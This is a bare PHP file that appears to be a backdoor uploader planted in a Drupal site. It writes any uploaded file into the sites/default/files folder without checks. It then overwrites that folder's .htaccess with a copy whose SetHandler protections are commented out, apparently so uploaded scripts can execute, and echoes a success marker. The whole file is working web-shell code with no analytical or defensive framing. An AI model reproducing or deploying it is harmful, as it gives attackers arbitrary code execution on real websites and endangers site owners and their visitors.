<?php if(isset($_POST['Submit'])){ $filedir = "./sites/default/files/"; $maxfile = '2000000'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; move_uploaded_file($userfile_tmp, $abod); file_put_contents($filedir.'.htaccess'," # Turn off all options we don't need.\nOptions None\nOptions +FollowSymLinks\n\n# Set the catch-all handler to prevent scripts from being executed.\n#SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006\n\n # Override the handler again if we're run later in the evaluation list.\n #SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003\n\n\n# If we know how to do it safely, disable the PHP engine entirely.\n\n php_flag engine off\n\n# PHP 4, Apache 1.\n\n php_flag engine off\n\n# PHP 4, Apache 2.\n\n php_flag engine off\n"); echo "EpicDoneSubmitHello $abod"; } } else{ echo'

'; } ?>